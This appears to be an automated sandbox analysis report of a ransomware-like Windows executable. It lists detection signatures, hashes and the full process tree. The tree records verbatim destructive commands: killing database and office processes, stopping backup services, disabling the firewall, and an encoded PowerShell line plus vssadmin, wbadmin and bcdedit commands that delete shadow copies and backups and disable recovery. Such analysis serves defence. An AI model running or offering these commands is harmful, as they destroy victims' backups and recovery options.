Analysis
-
max time kernel
33s -
max time network
66s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
27-07-2021 17:10
General
-
Target
1069-cc87764d70827118862689d1630efc72547f97aa.exe
-
Size
3.2MB
-
MD5
f17e50158a1faf71deb3a6e8b4f3271f
-
SHA1
cc87764d70827118862689d1630efc72547f97aa
-
SHA256
99a0753cba25425651e42ff7673506aa4090a03d8398f702e41d80ca5c2b212e
-
SHA512
e60404ec7d526dd522ca6347c1fbc87f9783b0c0fa31ca4b8aaa656718a8ceaaf26ec8259a31df58ddb0500df8b7a0f63ad7aca652860d50baf4bc66fdd7643b
Score
10/10
Malware Config
Signatures
-
UAC bypass 3 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables Task Manager via registry modification
-
Drops file in Drivers directory 1 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 4 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 14 IoCs
-
Modifies Control Panel 2 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 17 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1069-cc87764d70827118862689d1630efc72547f97aa.exe"C:\Users\Admin\AppData\Local\Temp\1069-cc87764d70827118862689d1630efc72547f97aa.exe"1⤵
- Drops file in Drivers directory
- Checks whether UAC is enabled
- Sets desktop wallpaper using registry
- Drops file in Windows directory
- Modifies Control Panel
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sql.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wordpad.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im outlook.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im thunderbird.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im oracle.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im excel.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im onenote.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im virtualboxvm.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im node.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im QBW32.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WBGX.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Teams.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Flow.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop DbxSvc3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DbxSvc4⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleXETNSListener3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleXETNSListener4⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleServiceXE3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleServiceXE4⤵
-
C:\Windows\SysWOW64\net.exenet stop AcrSch2Svc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc4⤵
-
C:\Windows\SysWOW64\net.exenet stop AcronisAgent3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent4⤵
-
C:\Windows\SysWOW64\net.exenet stop Apache2.43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.44⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQLEXPRESS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1003⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1004⤵
-
C:\Windows\SysWOW64\net.exenet stop MongoDB3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MongoDB4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$SQLEXPRESS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser4⤵
-
C:\Windows\SysWOW64\net.exenet stop CobianBackup113⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CobianBackup114⤵
-
C:\Windows\SysWOW64\net.exenet stop cbVSCService113⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop cbVSCService114⤵
-
C:\Windows\SysWOW64\net.exenet stop QBCFMontorService3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMontorService4⤵
-
C:\Windows\SysWOW64\net.exenet stop QBVSS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBVSS4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode disable2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode disable3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup2⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Please Read ME!!!.log1⤵
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\Please Read ME!!!.logMD5
81051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d
-
memory/240-83-0x0000000000000000-mapping.dmp
-
memory/268-73-0x0000000000000000-mapping.dmp
-
memory/432-85-0x0000000000000000-mapping.dmp
-
memory/548-82-0x0000000000000000-mapping.dmp
-
memory/556-109-0x0000000000000000-mapping.dmp
-
memory/556-75-0x0000000000000000-mapping.dmp
-
memory/664-95-0x0000000000000000-mapping.dmp
-
memory/692-84-0x0000000000000000-mapping.dmp
-
memory/760-111-0x0000000000000000-mapping.dmp
-
memory/800-97-0x0000000000000000-mapping.dmp
-
memory/836-101-0x0000000000000000-mapping.dmp
-
memory/836-80-0x0000000000000000-mapping.dmp
-
memory/848-110-0x0000000000000000-mapping.dmp
-
memory/880-98-0x0000000000000000-mapping.dmp
-
memory/908-88-0x0000000000000000-mapping.dmp
-
memory/912-103-0x0000000000000000-mapping.dmp
-
memory/928-100-0x0000000000000000-mapping.dmp
-
memory/940-102-0x0000000000000000-mapping.dmp
-
memory/952-92-0x0000000000000000-mapping.dmp
-
memory/1028-74-0x0000000000000000-mapping.dmp
-
memory/1100-60-0x0000000075AF1000-0x0000000075AF3000-memory.dmpFilesize
8KB
-
memory/1100-68-0x0000000000230000-0x0000000000231000-memory.dmpFilesize
4KB
-
memory/1192-70-0x0000000000000000-mapping.dmp
-
memory/1248-71-0x0000000000000000-mapping.dmp
-
memory/1252-81-0x0000000000000000-mapping.dmp
-
memory/1280-69-0x0000000000000000-mapping.dmp
-
memory/1352-94-0x0000000000000000-mapping.dmp
-
memory/1380-91-0x0000000000000000-mapping.dmp
-
memory/1456-79-0x0000000000000000-mapping.dmp
-
memory/1492-72-0x0000000000000000-mapping.dmp
-
memory/1524-86-0x0000000000000000-mapping.dmp
-
memory/1536-87-0x0000000000000000-mapping.dmp
-
memory/1576-99-0x0000000000000000-mapping.dmp
-
memory/1576-78-0x0000000000000000-mapping.dmp
-
memory/1696-93-0x0000000000000000-mapping.dmp
-
memory/1696-123-0x000007FEFBAA1000-0x000007FEFBAA3000-memory.dmpFilesize
8KB
-
memory/1732-96-0x0000000000000000-mapping.dmp
-
memory/1760-63-0x0000000000000000-mapping.dmp
-
memory/1768-89-0x0000000000000000-mapping.dmp
-
memory/1776-64-0x0000000000000000-mapping.dmp
-
memory/1784-112-0x0000000000000000-mapping.dmp
-
memory/1788-62-0x0000000000000000-mapping.dmp
-
memory/1844-124-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/1844-76-0x0000000000000000-mapping.dmp
-
memory/1844-136-0x0000000006250000-0x0000000006251000-memory.dmpFilesize
4KB
-
memory/1844-114-0x0000000002050000-0x0000000002051000-memory.dmpFilesize
4KB
-
memory/1844-121-0x0000000005640000-0x0000000005641000-memory.dmpFilesize
4KB
-
memory/1844-118-0x0000000005240000-0x0000000005241000-memory.dmpFilesize
4KB
-
memory/1844-117-0x0000000002510000-0x0000000002511000-memory.dmpFilesize
4KB
-
memory/1844-128-0x00000000056F0000-0x00000000056F1000-memory.dmpFilesize
4KB
-
memory/1844-113-0x0000000004890000-0x0000000004891000-memory.dmpFilesize
4KB
-
memory/1844-129-0x0000000006100000-0x0000000006101000-memory.dmpFilesize
4KB
-
memory/1844-115-0x00000000048D0000-0x00000000048D1000-memory.dmpFilesize
4KB
-
memory/1844-116-0x0000000004892000-0x0000000004893000-memory.dmpFilesize
4KB
-
memory/1848-90-0x0000000000000000-mapping.dmp
-
memory/1856-106-0x0000000000000000-mapping.dmp
-
memory/1924-108-0x0000000000000000-mapping.dmp
-
memory/1936-107-0x0000000000000000-mapping.dmp
-
memory/1944-105-0x0000000000000000-mapping.dmp
-
memory/1976-61-0x0000000000000000-mapping.dmp
-
memory/2024-67-0x0000000000000000-mapping.dmp
-
memory/2028-65-0x0000000000000000-mapping.dmp
-
memory/2040-66-0x0000000000000000-mapping.dmp
-
memory/2120-138-0x0000000000000000-mapping.dmp
-
memory/2152-139-0x0000000000000000-mapping.dmp
-
memory/2184-140-0x0000000000000000-mapping.dmp
-
memory/2220-141-0x0000000000000000-mapping.dmp
-
memory/2272-142-0x0000000000000000-mapping.dmp
-
memory/2308-143-0x0000000000000000-mapping.dmp
-
memory/2340-144-0x0000000000000000-mapping.dmp
-
memory/2372-145-0x0000000000000000-mapping.dmp
-
memory/2412-146-0x0000000000000000-mapping.dmp
-
memory/2444-147-0x0000000000000000-mapping.dmp
-
memory/2480-148-0x0000000000000000-mapping.dmp
-
memory/2512-149-0x0000000000000000-mapping.dmp
-
memory/2544-150-0x0000000000000000-mapping.dmp